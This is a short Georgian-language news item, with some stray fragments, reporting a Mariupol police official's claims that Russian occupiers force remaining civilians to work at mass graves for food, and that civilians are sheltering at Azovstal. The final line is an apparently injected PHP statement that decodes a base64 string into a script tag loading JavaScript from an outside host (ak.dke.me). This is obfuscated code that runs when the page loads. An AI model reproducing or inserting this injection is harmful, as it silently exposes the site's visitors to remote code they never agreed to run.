celsiusi
ავერსი შნაიდერი
მარიუპოლის საპატრულო პოლიციის უფროსის ინფორმაციით, რუსი ოკუპანტები ქალაქში დარჩენილ მოსახლეობას საარსებო საკვების სანაცვლოდ ოკუპანტები საერთო სასაფლაოებზე ამუშავებენ. 
 
"აზოვსტალის ქარხნის ტერიტორიაზე ბევრი მშვიდობიანი მოქალაქეა: ბავშვები, ქალები, მოხუცები. ეს ადამიანები ქარხნის თავშესაფარში იმალებიან დაბომბვისგან თავის დასაცავად. მათ არ სჯერათ რუსი სამხედროების, რადგან დაინახეს რა ხდება ქალაქში. რუსები მარიუპოლში დარჩენილ მშვიდობიან მოსახლეობას ნანგრევების ამოსათხრელად და გვამების შესაგროვებლად იყენებენ. ხალხი საჭმლის სანაცვლოდ მასობრივ საფლავებზე მუშაობს. აბსოლუტურად ყველა იძულებულია, ატაროს თეთრი სამკლაურები მარჯვენა ფეხსა და მარცხენა მკლავზე. ამ სამკლაურებით კი სპეციალურად უშვებენ იქ, სადაც სროლები მიმდინარეობს",- ამბობს მიხაილო ვერშინინი. 
 
შეგახსენებთ, რომ პუტინის ჯარისკაცებმა ალყაშემორტყმული მარიუპოლის შიგნით გადაადგილებისთვის საშვების გაცემა დაიწყეს. რუსებთან ბრძოლას უკრაინელი ჯარისკაცები განაგრძობენ, მარიუპოლის დათმობას მტრისთვის არ აპირებენ. 
839
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");